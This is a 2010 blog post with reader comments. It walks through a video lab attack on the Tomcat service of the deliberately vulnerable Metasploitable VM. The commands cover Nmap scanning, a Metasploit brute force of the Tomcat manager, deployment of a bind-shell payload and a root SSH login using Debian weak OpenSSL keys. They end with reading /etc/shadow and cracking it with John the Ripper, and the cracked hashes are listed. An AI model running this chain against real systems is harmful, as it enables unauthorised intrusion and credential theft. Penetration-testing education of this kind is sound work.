2010-07-01

[Video] Metasploitable - Tomcat

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826187
Download video: http://www.mediafire.com/?wv748u6o2jabdsw
Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw
Download (debian_ssh_rsa_2048_x86.tar.bz2):  http://www.mediafire.com/?i2mnwymzt51


What is this?
This video demonstrates an attack on the Tomcat service on the metasploitable hackable box.

"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

"Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." - tomcat.apache.org


Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to brute force the login (gaining access)
> Use Metasploit to send a payload (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


What do I need?
> Nmap --- on Backtrack 4 (Final)
> Metasploit --- on Backtrack 4 (Final)
> SSH--- on Backtrack 4 (Final) > John The Ripper --- on BackTrack!
> Dictionaries/Word-lists --- Usernames Passwords
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

 
Commands:
nmap 192.168.1.1-255
nmap -sV -sS -O -f -n 192.168.1.105
firefox 192.168.1.105
msfconsole
search tomcat
use scanner/http/tomcat_mgr_login
show options
setg RHOSTS 192.168.1.105
setg RPORT 8180
set USER_FILE /root/usernames.lst
set PASS_FILE /root/passwords.lst
exploit
use multi/http/tomcat_mgr_deploy
show options
setg USERNAME tomcat
setg PASSWORD tomcat
show payloads
set payload generic/shell_bind_tcp
show options
exploit
ls
whoami
hostname
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow
kate -> Paste -> Save (Filename: /root/shadow)
john
./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst
ssh msfadmin@192.168.1.105



------------------------------------------------------------------------------------root:             = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
sys:batman        = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
klog:123456789    = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
user:user         = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:service   = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
------------------------------------------------------------------------------------

Notes:
Song: Underworld - Cowgirl
Video length: 7:07
Capture length: 11:17

Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tomcat.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30078-%5Bvideo%5D-metasploitable-tomcat.html#post167042



~g0tmi1k
Posted by g0tmi1k at 13:10
Labels: , ,

17 comments:

  1. Thx for this great Tutorial.

    I still get
    "Exploit completed, but no session was created."
    when i try to exploit.
    I've tried most of the Payloads, all with the same error.
    Any suggestions?

    ReplyDelete

  2. @jpg
    Im not 100% sure why.
    Did you try generic/shell_bind_tcp?
    What version are you running? What is your setup?
    What happens if you "cheat" that stage? Can you still do the other stages afterwards?

    ReplyDelete

  3. @g0tm1lk
    I'm using the newest version of Metasploit ( v3.4.2).
    generic/shell_bind_tcp didn't work, as well as
    generic/shell_reverse_tcp
    linux/x86/shell/bind_tcp
    linux/x86/shell_bind_tcp and a few other linux payloads including meterpreter

    My Setup: Backtrack 4 R1 and Metasploitable in VirtualBox in virtuallan-mode. both with static IPs. i don't think it depends on that, all except the exploiting works

    ReplyDelete

  4. @jpg
    Can you login using "tomcat", "tomcat"?

    ReplyDelete

  5. This comment has been removed by the author.

    ReplyDelete

  6. On Metasploitable it isn't possible to login as "tomcat" the user ist called "www-data".
    But msfadmin:msfadmin works certainly.
    The Tomcat Webinterface works and i can login to that with tomcat:tomcat.

    I've thought, that anybody had a clue why my exploiting doesn't work.
    Although i've cheated a little so i could continue without using the tomcat-exploit to finish the pentest.

    ReplyDelete

  7. @jpg
    Which bit fails?
    scanner/http/tomcat_mgr_login
    *** OR ****
    multi/http/tomcat_mgr_deploy

    ReplyDelete

  8. Sry, i didn't mentioned that. The "tomcat_mgr_deploy" didn't work for me. Sure it's not your fault, your method seems to work for some people :)
    So if anybody who watch this vid have the same problem and have a clue, please post it here.

    ReplyDelete

  9. jpg use payload linux/x86/shell_bind_tcp instead of the generic.

    ReplyDelete

  10. @jpg
    I hope you have it working by now *as its been a while ;)*
    I'm not sure why its not working for you.
    Have you tried any other attacks points?


    @Casey
    Thanks for the tip!
    However, its the scanning part that is failing, not the exploit. jpg is (or was?) unable to get the correct login details.

    ReplyDelete

  11. hey guys,
    thx for the support.

    Last time i've tried it i couldn't get it working. But it was only for an essay and playing around with some tools, so i've no reason for do it again.

    so thx again!

    ReplyDelete

  12. @jpg
    That must of been some essay! I wished my school let me do things like that. Hope you got a good grade at it, sorry we didn't get it working for you in time.

    ReplyDelete

  13. Thank you, great tutorial g0tmi1k. I've a short question.

    I couldn't understand the logic behing getting the auth_key and comparing it with deb_ssh_rsa_2048.
    Can this be applied for every kind of situation, or was it possible because there was some kind of weakness in the auth_keys, or the ssh version itself.
    If it's a general approach, we could just brute-force every ssh server with the keys in deb_ssh_rsa_2048, right?

    ReplyDelete

  14. @g0tmi1k
    I'm not a regular blogger user, so I tought I may have to do the [at]username thing so you receive my post above

    ReplyDelete

  15. @Tyler
    The logic behind getting the "auth_key" and comparing it with "deb_ssh_rsa_2048" is:
    "authorized_keys" has the public key in it - AAAAB3NzaC....

    By searching, the attacker can match up the same public key that was generated by the Debian OpenSSL weakness file(s)- "57c3115d77c56390332dc5c49978627a-5429.pub"

    The attacker found the public key name. Because public and private key is "linked" and because of the weakness, they also have the private key.

    The attack then just uses the private key to connect back - without ever knowing what the password was.


    There WAS a weakness: "the debian openssl issue leads that there are only 65.536 possible ssh
    keys generated". The issue was how the SSH key were generated. After the patch, when the keys are generated, it creates alot more possibles which makes it A LOT harder to predict the key. Because there are more keys, deb_ssh_rsa_2048 will not work.


    I do "[at] username", to show who I am addressing as sometimes I reply to a couple of people in one post.
    As I haven't left a comment other than on my own blog - I do not know how the replying system works!
    *Its different to me, as I am the owner of this blog =P*

    ReplyDelete

  16. Thank you g0tmi1k.
    I appreciate the detailed answer. Thank you for explaining it in detail, it's now clear for me.
    Cheers

    ReplyDelete

  17. @Tyler
    Your welcome!
    Best of luck!

    ReplyDelete

Subscribe to: Post Comments (Atom)